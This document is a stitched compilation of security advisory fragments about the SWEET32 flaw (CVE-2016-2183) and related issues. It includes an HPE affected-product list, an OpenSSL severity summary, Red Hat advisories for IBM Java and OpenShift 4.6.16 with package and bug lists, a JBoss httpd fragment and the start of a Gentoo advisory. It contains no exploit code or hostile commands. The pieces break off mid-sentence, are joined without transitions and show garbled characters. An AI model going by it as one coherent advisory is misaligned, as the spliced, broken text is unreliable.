TAA-compliant with Comware v7 Operating System Main Processing Unit + **12900 (Comware 7) - Version: See Mitigation** * HP Network Products - JG619A HP FlexFabric 12910 Switch AC Chassis - JG621A HP FlexFabric 12910 Main Processing Unit - JG632A HP FlexFabric 12916 Switch AC Chassis - JG634A HP FlexFabric 12916 Main Processing Unit - JH104A HP FlexFabric 12900E Main Processing Unit - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit - JH263A HP FlexFabric 12904E Main Processing Unit - JH255A HP FlexFabric 12908E Switch Chassis - JH262A HP FlexFabric 12904E Switch Chassis - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis - JH103A HP FlexFabric 12916E Switch Chassis + **5900 (Comware 7) - Version: See Mitigation** * HP Network Products - JC772A HP 5900AF-48XG-4QSFP+ Switch - JG296A HP 5920AF-24XG Switch - JG336A HP 5900AF-48XGT-4QSFP+ Switch - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch - JG555A HP 5920AF-24XG TAA Switch - JG838A HP FF 5900CP-48XG-4QSFP+ Switch - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant + **MSR1000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG875A HP MSR1002-4 AC Router - JH060A HP MSR1003-8S AC Router + **MSR2000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG411A HP MSR2003 AC Router - JG734A HP MSR2004-24 AC Router - JG735A HP MSR2004-48 Router - JG866A HP MSR2003 TAA-compliant AC Router + **MSR3000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG404A HP MSR3064 Router - JG405A HP MSR3044 Router - JG406A HP MSR3024 AC Router - JG407A HP MSR3024 DC Router - JG408A HP MSR3024 PoE Router - JG409A HP MSR3012 AC Router - JG410A HP MSR3012 DC Router - JG861A HP MSR3024 TAA-compliant AC Router + **MSR4000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG402A HP MSR4080 Router Chassis - JG403A HP MSR4060 Router Chassis - JG412A HP MSR4000 MPU-100 Main Processing Unit - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit + **VSR (Comware 7) - Version: See Mitigation** * HP Network Products - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software - JG811AAE HP VSR1001 Comware 7 Virtual Services Router - JG812AAE HP VSR1004 Comware 7 Virtual Services Router - JG813AAE HP VSR1008 Comware 7 Virtual Services Router + **7900 (Comware 7) - Version: See Mitigation** * HP Network Products - JG682A HP FlexFabric 7904 Switch Chassis - JG841A HP FlexFabric 7910 Switch Chassis - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit + **5130 (Comware 7) - Version: See Mitigation** * HP Network Products - JG932A HP 5130-24G-4SFP+ EI Switch - JG933A HP 5130-24G-SFP-4SFP+ EI Switch - JG934A HP 5130-48G-4SFP+ EI Switch - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch - JG938A HP 5130-24G-2SFP+-2XGT EI Switch - JG939A HP 5130-48G-2SFP+-2XGT EI Switch - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch - JG975A HP 5130-24G-4SFP+ EI Brazil Switch - JG976A HP 5130-48G-4SFP+ EI Brazil Switch - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch + **6125XLG - Version: See Mitigation** * HP Network Products - 711307-B21 HP 6125XLG Blade Switch - 737230-B21 HP 6125XLG Blade Switch with TAA + **6127XLG - Version: See Mitigation** * HP Network Products - 787635-B21 HP 6127XLG Blade Switch Opt Kit - 787635-B22 HP 6127XLG Blade Switch TAA + **Moonshot - Version: See Mitigation** * HP Network Products - 786617-B21 - HP Moonshot-45Gc Switch Module - 704654-B21 - HP Moonshot-45XGc Switch Module - 786619-B21 - HP Moonshot-180XGc Switch Module + **5700 (Comware 7) - Version: See Mitigation** * HP Network Products - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch + **5930 (Comware 7) - Version: See Mitigation** * HP Network Products - JG726A HP FlexFabric 5930 32QSFP+ Switch - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch - JH179A HP FlexFabric 5930 4-slot Switch - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch + **HSR6600 (Comware 7) - Version: See Mitigation** * HP Network Products - JG353A HP HSR6602-G Router - JG354A HP HSR6602-XG Router - JG776A HP HSR6602-G TAA-compliant Router - JG777A HP HSR6602-XG TAA-compliant Router + **HSR6800 (Comware 7) - Version: See Mitigation** * HP Network Products - JG361A HP HSR6802 Router Chassis - JG361B HP HSR6802 Router Chassis - JG362A HP HSR6804 Router Chassis - JG362B HP HSR6804 Router Chassis - JG363A HP HSR6808 Router Chassis - JG363B HP HSR6808 Router Chassis - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit + **1950 (Comware 7) - Version: See Mitigation** * HP Network Products - JG960A HP 1950-24G-4XG Switch - JG961A HP 1950-48G-2SFP+-2XGT Switch - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch + **7500 (Comware 7) - Version: See Mitigation** * HP Network Products - JD238C HP 7510 Switch Chassis - JD239C HP 7506 Switch Chassis - JD240C HP 7503 Switch Chassis - JD242C HP 7502 Switch Chassis - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit - JH208A HP 7502 Main Processing Unit - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit + **5950 (Comware 7) - Version: See Mitigation** * HP Network Products - JH321A HPE FlexFabric 5950 32QSFP28 Switch + **5940 (Comware 7) - Version: See Mitigation** * HP Network Products - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch - JH396A HPE FlexFabric 5940 32QSFP+ Switch - JH397A HPE FlexFabric 5940 2-slot Switch - JH398A HPE FlexFabric 5940 4-slot Switch HISTORY Version:1 (rev.1) - 6 December 2016 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Of these 14 vulnerabilities, the OpenSSL Software Foundation classifies one as aCritical Severity,a one as aModerate Severity,a and the other 12 as aLow Severity.a Subsequently, on September 26, the OpenSSL Software Foundation released an additional advisory that describes two new vulnerabilities. These vulnerabilities affect the OpenSSL versions that were released to address the vulnerabilities disclosed in the previous advisory. One of the new vulnerabilities was rated as aHigh Severitya and the other as aModerate Severity.a Of the 16 released vulnerabilities: Fourteen track issues that could result in a denial of service (DoS) condition One (CVE-2016-2183, aka SWEET32) tracks an implementation of a Birthday attack against Transport Layer Security (TLS) block ciphers that use a 64-bit block size that could result in loss of confidentiality One (CVE-2016-2178) is a timing side-channel attack that, in specific circumstances, could allow an attacker to derive the private DSA key that belongs to another user or service running on the same system Five of the 16 vulnerabilities affect exclusively the recently released OpenSSL versions that belong to the 1.1.0 code train, which has not yet been integrated into any Cisco product. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: java-1.8.0-ibm security update Advisory ID: RHSA-2017:0462-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2017-0462.html Issue date: 2017-03-08 CVE Names: CVE-2016-2183 ===================================================================== 1. Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 6 Supplementary and Red Hat Enterprise Linux 7 Supplementary. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client Supplementary (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Supplementary (v. 7) - x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 7) - x86_64 3. Description: IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR4-FP1. Security Fix(es): * This update fixes a vulnerability in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Further information about this flaw can be found on the IBM Java Security alerts page, listed in the References section. (CVE-2016-2183) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 All running instances of IBM Java must be restarted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.i686.rpm x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.i686.rpm ppc64: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.ppc64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.ppc64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.ppc64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.ppc64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.ppc64.rpm s390x: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.s390x.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.s390x.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.s390x.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.s390x.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.s390x.rpm x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.1.el6_8.i686.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.i686.rpm x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.1.el6_8.x86_64.rpm Red Hat Enterprise Linux Client Supplementary (v. 7): x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Supplementary (v. 7): x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 7): ppc64: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.ppc.rpm java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.ppc64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.ppc64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.ppc.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.ppc64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.2.el7.ppc64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.2.el7.ppc64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.ppc64.rpm ppc64le: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.ppc64le.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.ppc64le.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.ppc64le.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.2.el7.ppc64le.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.ppc64le.rpm s390x: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.s390.rpm java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.s390x.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.s390x.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.s390.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.s390x.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.2.el7.s390x.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.s390x.rpm x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 7): x86_64: java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-demo-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.i686.rpm java-1.8.0-ibm-devel-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-jdbc-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-plugin-1.8.0.4.1-1jpp.2.el7.x86_64.rpm java-1.8.0-ibm-src-1.8.0.4.1-1jpp.2.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-2183 https://access.redhat.com/security/updates/classification/#moderate https://developer.ibm.com/javasdk/support/security-vulnerabilities/ 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFYwAfWXlSAg2UNWIIRApdJAJ9aWdfCBOWjqVaBLGFXAtS6LJvZXACgkneE 4LO+U1cfPB3cdxvKJ71gfCg= =89qB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.6.16. See the following advisory for the RPM packages for this release: https://access.redhat.com/errata/RHBA-2021:0309 Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html You may download the oc tool and use it to inspect release image metadata as follows: (For x86_64 architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.6.16-x86_64 The image digest is sha256:3e855ad88f46ad1b7f56c312f078ca6adaba623c5d4b360143f9f82d2f349741 (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.6.16-s390x The image digest is sha256:2335685cda334ecf9e12c056b148c483fb81412fbfc96c885dc669d775e1f1ee (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.6.16-ppc64le The image digest is sha256:953ccacf79467b3e8ebfb8def92013f1574d75e24b3ea9a455aa8931f7f17b88 All OpenShift Container Platform 4.6 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor. Security Fix(es): * SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) (CVE-2016-2183) * openshift/builder: privilege escalation during container image builds via mounted secrets (CVE-2021-3344) * openshift/installer: Bootstrap nodes allow anonymous authentication on kubelet port 10250 (CVE-2021-20198) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution: For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/): 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1873004 - [downstream] Should indicate the version info instead of the commit info 1887759 - [release 4.6] Gather MachineConfigPools 1889676 - [release 4.6] Gather top installplans and their count 1889865 - operator-registry image needs clean up in /tmp 1890274 - [4.6] External IP doesn't work if the IP address is not assigned to a node 1890452 - Adding BYOK disk encryption through DES 1891697 - Handle missing labels as empty. 1891892 - The windows oc.exe binary does not have version metadata 1893409 - [release-4.6] MCDPivotError alert/metric missing 1893738 - Examining agones helm chart resources results in "Oh no!" 1894916 - [4.6] Panic output due to timeouts in openshift-apiserver 1896919 - start creating new-style Secrets for AWS 1898672 - Pod gets stuck in ContainerCreating state with exhausted Whereabouts IPAM range with a daemonset 1899107 - [4.6] ironic-api used by metal3 is over provisioned and consumes a lot of RAM 1899535 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster 1901602 - Extra reboot during 4.5 -> 4.6 upgrade 1901605 - CNO blocks editing Kuryr options 1903649 - Automated cleaning is disabled by default 1903887 - dns daemonset rolls out slowly in large clusters 1904091 - Missing registry v1 protocol usage metric on telemetry 1904577 - [4.6] Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console 1905031 - (release-4.6) Collect spec config for clusteroperator resources 1905195 - [release-4.6] Detecting broken connections to the Kube API takes up to 15 minutes 1905573 - [4.6] Changing the bound token service account issuer invalids previously issued bound tokens 1905788 - Role name missing on create role binding form 1906332 - update discovery burst to reflect lots of CRDs on openshift clusters 1906741 - KeyError: 'nodeName' on NP deletion 1906796 - [SA] verify-image-signature using service account does not work 1907827 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber 1907830 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum" 1909673 - scale up / down buttons available on pod details side panel 1912388 - [OVN]: `make check` broken on 4.6 1912430 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap 1913109 - oc debug of an init container no longer works 1913645 - Improved Red Hat image and crashlooping OpenShift pod collection 1915560 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing 1916096 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. 1916100 - [oVirt] Consume 23-10 ovirt sdk - csi operator 1916347 - Updating scheduling component builder & base images to be consistent with ART 1916857 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change 1916907 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use 1917240 - [4.6] Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service 1917498 - Regression OLM uses scoped client for CRD installation 1917547 - oc adm catalog mirror does not mirror the index image itself 1917548 - [4.6] Cannot filter the platform/arch of the index image 1917549 - Failed to mirror operator catalog - error: destination registry required 1917550 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option 1917609 - [4.6z] Deleting an exgw causes pods to no longer route to other exgws 1918194 - with sharded ingresscontrollers, all shards reload when any endpoint changes 1918202 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks) 1918525 - OLM enters infinite loop if Pending CSV replaces itself 1918779 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state 1918792 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them 1918961 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere 1920764 - CVE-2021-20198 openshift/installer: Bootstrap nodes allow anonymous authentication on kubelet port 10250 1920873 - Failure to upgrade operator when a Service is included in a Bundle 1920995 - kuryr-cni pods using unreasonable amount of CPU 1921450 - CVE-2021-3344 openshift/builder: privilege escalation during container image builds via mounted secrets 1921473 - test-cmd is failing on volumes.sh pretty consistently 1921599 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set 5. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 2 serves as an update for Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1, and includes bug fixes, which are documented in the Release Notes document linked to in the References. Security Fix(es): * It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788) * It was discovered that in httpd 2.4, the internal API function ap_some_auth_required() could incorrectly indicate that a request was authenticated even when no authentication was used. An httpd module using this API function could consequently allow access that should have been denied. (CVE-2015-3185) * A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. Upstream acknowledges Karthikeyan Bhargavan (Inria) and GaA<<tan Leurent (Inria) as the original reporters of CVE-2016-2183. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. JIRA issues fixed (https://issues.jboss.org/): JBCS-329 - Unable to load large CRL openssl problem JBCS-337 - Errata for httpd 2.4.23 SP2 RHEL 6 7. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-65 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Oracle JRE/JDK: Multiple vulnerabilities Date: January 25, 2017 Bugs: #606118 ID: 201701-65 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Oracle's JRE and JDK software suites, the worst of which may allow execution of arbitrary code Background ========== Java Platform, Standard Edition (Java 